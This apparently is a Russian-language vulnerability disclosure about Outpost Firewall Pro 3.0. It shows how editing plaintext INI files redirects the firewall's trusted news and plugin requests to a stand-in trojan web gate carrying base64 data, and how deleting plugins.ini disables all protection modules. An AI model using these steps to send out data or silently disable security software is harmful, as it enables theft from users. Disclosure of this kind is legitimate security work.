14.09.2005 была опубликована возможность использования Outpost`a Firewall`a для отправки данных на web-гейт вируса. На mail саппорта было отправлено соответствующее письмо, но с выходом новой версии Outpost Firewall Pro ver. 3.0.543.5722 (431) ситуация не изменилась:

Возможна отправка любых данных на web-гейт трояна (напр. pinch 2 pro, a-311 и т.д.), достаточно изменить данные в файлах (пример для ru-язычной версии)

x:\…\Outpost Firewall\outpost.ini

[HttpAlerts]
NewsTime=10 //таймаут
NewsEnable=yes //меню->сервис-> загружать новости
PluginsTime=10 //таймаут
PluginsEnable=yes //меню->сервис-> загружать информацию о модулях

x:\…\Outpost Firewall\op_links.ini

NewsPage_ru=http://www.site.ru/mail.php? a=mail@mail.ru&b=subject&c=base64data
PluginsPage_ru=http://www.site.ru/mail.php? a=mail@mail.ru&b=subject&c=base64data
PluginsPageAdv_ru=http://www.site.ru/mail.php? a=mail@mail.ru&b=subject&c=base64data

По умолчанию (автоматическая настройка) Outpost Firewall ставит свою программу в «разрешенный список».
Самое просто, что можно сделать – запретить Outpost Firewall доступ к сети.

Следующим недочетом является полное отключение всех подключаемых модулей, таких как Anti-Spyware, DNS, Детектор атак и прочие. Достаточно удалить файл

x:\…\Outpost Firewall\plugins.ini

После рестарта программы – она «не видит» ни одного модуля.
Данные уязвимости существует из-за того, что все эти данные храниться в открытом, доступном виде.

Подытожить можно следующим: при установки Agnitum Outpost Firewall 3.0 на персональный компьютер вы не получите обещанную высокую защиту от производителя. Данные примеры показывают, насколько можно просто и без особых средств отправить
ваши персональные данные на web-гейт трояна, отключить модули программы.



Оставить мнение